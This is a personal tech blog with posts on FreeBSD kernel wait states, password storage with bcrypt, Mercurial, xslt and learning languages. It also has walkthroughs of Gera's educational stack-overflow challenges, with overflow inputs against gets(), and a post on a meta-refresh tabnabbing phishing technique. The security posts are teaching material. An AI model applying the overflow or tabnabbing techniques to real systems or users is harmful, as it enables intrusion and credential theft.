Saturday, December 25, 2010

Warming up to the stack #3

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  if (cookie == 0x01020005)
    printf("you win!\n");

Not much is new here. We exploit this the same was we did the first two except that we have a null character (ctrl @).

I want to point out one thing that I didn't mention on my previous posts. The address of cookie and buf are printed out so we don't really need to "guess" where they are on the stack. I ignored this before, because in real programs, the address values are rarely printed out.

Thursday, December 23, 2010

Warming up to the stack #2

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  if (cookie == 0x01020305)
    printf("you win!\n");

Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.

There are a few ways to deal with this:
  • Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
  • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
  • Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!

Tuesday, December 21, 2010

Gera's Insecure Programming: Warming up to the stack #1

Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output you win!"

The code for the first one
* stack1.c
* specially crafted to feed your brain by gera
int main() {
   int cookie;
   char buf[80];
   printf("buf: %08x cookie: %08x\n", &buf, &cookie);
   if (cookie == 0x41424344)
      printf("you win!\n");

At a lower level
The assembly for the above program generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition)
   pushl %esi
   subl $100, %esp
   leal -8(%ebp), %eax
   movl %eax, 8(%esp)
   leal -88(%ebp), %esi
   movl %esi, 4(%esp)
   movl $.L.str, (%esp)
   call printf
   movl %esi, (%esp)
   call gets      ; note that gets does not have a length argument
   cmpl $1094861636, -8(%ebp)
   jne .LBB0_2    ; we will come back to this
   movl $str, (%esp)
   call puts
   xorl %eax, %eax
   addl $100, %esp
   popl %esi

Break it down
The program starts off by creating two variables: a cookie and a fixed size buffer. It then prints out the address of buf and cookie
Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters. 0x41is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: The machine I'm using (and most you probably are) is little endian so we actually need to reverse the order of our text.
What should we actually do?
There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1 so our stack probably looks like:
cookie most significant byte
cookie byte 2
cookie byte 3 
cookie least significant byte
Lets try it!

The string we want to insert is
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

[eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
[eitan@ByteByte ~/gstack ]%./a.out <exploit 
buf: bfbfea48 cookie: bfbfea98
you win!
A different way:
Lets say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you could can change the jump address or just remove the jump altogether to avoid the check
[eitan@ByteByte ~/gstack !130!]%./a.out
buf: bfbfea48 cookie: bfbfea98
you win!
Some notes

No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

Thursday, December 2, 2010

Google translate proxy no longer available

One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

I recently came across a link that happen to be using Google translate in that way a (I'm not sure why) and I got an error from Google

"Translation from English into English is not supported."

When I tried with other languages I got similar errors. Translating to other languages works as usual.

Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

Sunday, October 10, 2010

What language should you learn first?

Kaushal Shriyan on the mailing list asked:
"Is it better to learn Perl or Python since i can manage only writing simple bash shell scripts."[1]
Recently on ##C++-basic there was a discussion that related to learning low level vs high level languages first.

Both of these discussions are based on the premise that there is a right answer.

There are a number of things wrong with this question.
  1. Kaushal seems to be saying that he can only learn one language or the other. Why not learn both?
  2. Programming language choice depends on the project one plans on working on. Using perl to write a kernel is impossible and using COBOL to write a GUI application is silly. Asking such a question requires more context.
  3. For some reason only Perl and Python are the only languages given as choices. What about C++? Why not Haskell? There are many useful languages and they each have their own pros and cons.
More generally, there are many skills have a programmer needs to have and there are different ways of learning each of these skills.
  • Code organization and Design Patterns
  • Programming constructs
  • Abstraction and encapsulation
  • Data structures and how to choose between them
  • Syscalls and context switching
  • and many more
All of these topics can be reasonably broken down into two types: programming topics and computer science topics.

Higher-level languages allow programmers to abstract away the low level details and focus on getting a task done. This is great for completing a task and making a beginner feel proud about what (s)he has created. It also helps the programmer learn programming basics such as variables, loops, arrays, input/output, and functions without getting bogged down with memory management.

On the other hand, choosing between various data structures is confusing unless one understands why things work the way they do. Learning about context switches, data structures, syscalls, pointers, etc is easier in a low level language (like C or C++).
So what language should someone learn first?

A good programmer should learn both types of languages. In my experience a lot beginners have trouble wrapping their heads around functions and other organizational patterns such as classes. I usually start people with Python and move quickly to C++. This helps to teach good programming style and techniques before they get to learn the low level concepts as well. 


Tuesday, September 21, 2010

Proccess Kernel States (wchan in ps)

FreeBSD has a nice feature that will signal a process with SIG-INFO when you press Ctrl-T and will tell you some other interesting data about the process such as the load of the CPU, current command that is being run, and the kernel state the process is in (the wchan keyword in ps(1)).
This state is set by the msleep function and is a syscall or lock that the proccess is waiting on

I know of no other list explaining each of these states so here it goes:

biord: block on io read.
futex: [Linux emulation] process is waiting until a futex is released (see fast userspace mutex)
getblk: get block (seems to be generated often by tar)
nanoslp: process is sleeping for some number of nanoseconds (see nanosleep(2))
pause: process is waiting for a signal (see pause(3))
pcmwrv: waiting for audio samples to be played
piperd: read(2) from a pipe
pipewr: write(2) to a pipe
physrd: reading from a HDD
runnable: process is ready to run on the CPU
running: currently on CPU
sbwait: wait for socket to return data (see uipc_sockbuf.c) 
swread: read in from swap
stopev: process is stopped because of a debugging event (see sys_process.c; relates to ptrace(2))
tttout: write(2) to a tty
ttyin: read(2) from a tty
ucond: a proccess is blocked until a pthreads mutex is released
vnread: part of the pager (see vnode_pager.c)
wait: wait(2) for a child process
wdrain: write drain. On a device mounted with the async option (or soft-updates) wait until all the previous writes have been completed. (see vfs_bio.c)
zombie: a process died but its parent did not wait(2) for it.

There are other syscalls that are similar to the ones mentioned above (such as readv(2) instead of read(2), and waitpid(2) instead of wait(2)) which will end up with the same wchans.

Thank you irc:// for helping me figure out what all of these mean.

I will try to keep this list up-to-date as I find out about more of them.

Update 9/21/10: removed "CPU0" state - it doesn't show up in the siginfo output - only in the top output.
Update 9/22/10: added getblk entry without link to syscall
Update 10/7/10: added wdrain, swread - I have a /lot/ more to add. 
I need to add all the following - and more: sfbufa, umtxqb, psleep, qsleep, bo_wwait, bwunpin, sigwait, pause, suspkp suspkp ktsusp  mntref, "mount drain", roothold, rootwait, failpt, exithold, exit1, ritwait , kqflxwt, kqclose, kqclo1, kqclo2, kqkclr, kqflxwt, ithread, iev_rmh , purgelocks, conifhk, aioprn, aiordy, aiospn, aiowc vlruwt vlruwk targrd tgabrt cgticb cgticb  sgread simfree ccb_scanq crydev  crypto_destroy crypto_destroy crypto_ret_wait

Thursday, July 1, 2010

Sunday, May 30, 2010

Tabnabbing Without Javascript

    I recently came across a new type of phishing attack called tabnabbing. The attack works by using a client side script to detect when the user is not viewing the page, then changes the page content to a phishing page.

    This method desribed by Aza Raskin could be easily prevented by disabling Javascript. However, it is possible to perform the attack even if Javascript is disabled. Most browsers have the ability to refresh the page using a <meta> refresh tag. The page waits until presumably the user isn't looking at the tab any more, then changes the location of the page to one that resembles the true site (as shown in this proof of concept).

If you got to this post via the POC please note that the POC is not a phishing site and I DO NOT log ANY usernames or passwords.

Sunday, March 28, 2010

How to safely handle user passwords

When you create a website or other service you take on a responsibility to properly store user's credentials; someone who gets access to a user's account can easily see personal information, potentially even financial information. Even if you think you don't have anything of importance, 73% of users[1] have the same password for everything including online banking accounts.

When dealing with passwords, you should generally assume that the attacker has a copy of your database. Many websites still have SQL injection attacks[2]. Most websites are vulnerable to XSS/CSRF attacks.[3]. For this reason it is a bad idea to store passwords as clear text; instead one should use a hash[4].

Even with properly stored passwords users still insist on choosing low security passwords.[5]. As a result malicious hackers have compiled lists of commonly used passwords. In order to mitigate these brute force attacks a lot of techniques have been developed. For example, some sites require you to enter a CAPTCHA, but most of these could easily be defeated[6]. Another simple technique is to limit login failures (once an incorrect password has been entered don't allow another attempt for X period of time). I prefer an exponential delay where each failed attempt causes the delay the become longer than the previous one. There are other possibilities that could take into account more sophisticated criteria such as the geographical region and time of day.

Although important to know the above solutions won't help in the case the attacker has a copy of the user database. In the past hashing the password was sufficient to prevent an attacker from accessing user accounts. Nowadays computers are fast enough that even though the passwords are hashed, compromise is still possible. This is done by taking the list of commonly used passwords and hashing them to see if any match the database. In order to limit the potential for this attack, a new defense was created called "salting". What this entails is hashing a random value (called a "salt") combined with the password. When the user submits his password the system hashes it combined with the salt and compares the combination to the hash already stored in the database. The security benefit of this is that the attacker needs to calculate the hashes for common passwords for each user.

As technology improved even this became insecure. Nowadays attackers can just hash every conceivable password. Furthermore attackers can work together and using "rainbow tables" which contain pre-computed hashes of millions of passwords and salts. These tables are often generated using distributed computing - so each attacker does not have to develop one on their own. This reduces the amount of security that salts can offer.

Now that salting is not good enough we need to explore other options. The main factor when exploring these options is time; this is because it is impossible to create an uncrackable password. What we do instead is increase the time requirement to discover the passwords so as to discourage the attacker. The issue is that many hash functions were not designed for password security, but rather for speedy verification. Hash functions like sha-256 (despite currently being unbroken) lends itself to quickly hashing lists of passwords. Modern computers can md5-hash every conceivable alphanumeric 7 character password in less than hour[7]. Despite widespread use old hash functions like md5[8] or sha1[9] were recently discovered to be insecure.

Today there is bcrypt [pdf], a special hash function created specifically for password security. Uniquely designed, it is slow, and can keep up with the constantly increasing speeds of computers because it uses a "work factor". Although you might be thinking that this will bog down your server, those that use it don't find this to be an issue. For these reasons I strongly advise the use bcrypt along with the the previously stated techniques such as salting.

2011-6-16: update: At the time I wrote this article I was unaware scrypt, a slower (and therefore better) function to use[10]

[4] A hash is a function that takes some input and outputs a (sufficiently) unique output such that the original input can not be recovered. One simplistic (and highly insecure) hash function would be count the number of times specific letters occurs and store that instead. For example "One very bad zany apple" would become "31012000000102110100010021". It is not possible to know whether this hash becomes "One very bad zany apple", "Noe vrey adb nzya pplea", or "Npdyoazaevebrnpyela". A cryptographic hash function is designed so that multiple passwords like this are hard to create.
[5] [pdf]
[6] Aska: A viable alternative to CAPTCHA? - Eitan Adler (2008)

Edit 2010-3-31: fix footnote numbers; subtle grammar errors fixed.
Edit 2011-2-11: grammar errors fixed - thanks JT.

Edit 2011-6-16: change dates to use ISO format

tsocks with svn - failure

tsocks is a program that will "sockify" any application. It does so by watching the application and rewriting any networking requests to go through the socks server you specify in tsocks.conf.

You can either use tsocks by running tsocks command [arguments] or by running tsocks on followed by the commands you want to run. You turn it off by running tsocks off.

I ran into an annoying error when using tsocks to sockify subversion. I got the error
svn: OPTIONS of '...': could not connect to server (...)
It turns out that using "tsocks svn up" failed this way, but if I tried the second possibility (tsocks on; svn up; tsocks off) it works.
I have no clue why this might be.

Sunday, March 21, 2010

Mercurial Extensions

Mercurial has the ability to load extensions dynamically. All that is required is to modify ~/.hgrc.

In order to add an extension open ~/.hgrc in your preferred text editor. Then look for a line that looks like [extensions]. If you don't find one add it to file. Under this line you can add a large number of extensions. Stock mercurial comes with a number of useful extensions (although none of them are turned on by default).

The following are the ones I found useful.
color  - displays output from some commands in color
fetch - does hg fetch; hg update; hg merge in one command
graphlog - command to view revision graphs from a shell
progress (hgext.progress) - shows progress of some commands

to learn more about extensions type hg help extensions into the command line.

Monday, March 1, 2010

Prediction: yahoo won't matter

Within the next 5 years Yahoo!, like AOL will still be around but won't matter at all.

Thursday, February 4, 2010

The Daily Monthly

From the author of Cognitive Daily we have the The Daily Monthly. Each month a new topic but each day a new post (

Sunday, January 24, 2010

Cognitive Daily comes to a close

Cognitive Daily, one of the best physcology blogs around, announced they will no longer be posting anything new.
I've been reading Cognitive Daily since I was in high school and I'm very saddened to see it go.

Tuesday, January 5, 2010

Useful google search tip

One way to avoid Google getting "too smart" about your search query is to purposely misspell words. Sometimes I've found more relevant results when I do that. The misspelling has to be close to the original word though.

Sunday, January 3, 2010

xslt: != vs not()

I made a minor change to my xslt file. I often write "stub questions" in my FAQ to remind myself to answer them. I added a simple attribute to the "item" element

<xs:attribute name="stub" default="false">
<xs:restriction base="xs:string">
<xs:enumeration value="true"/>
<xs:enumeration value="false"/>

This creates an optional attribute "stub" that is a string which could either be "true" or "false" and is by default "false".

That wasn't too hard to figure out. The harder part was getting my XSLT file to only display non-stub questions.

My first try was <xsl:if test="@stub != 'false'"> (I used != because of the default).
This however never showed any of my questions. It turns out that != doesn't work when an element doesn't exist. After asking around on IRC <xsl:if test="not(@stub = 'true')"> appears to be the correct way to do things.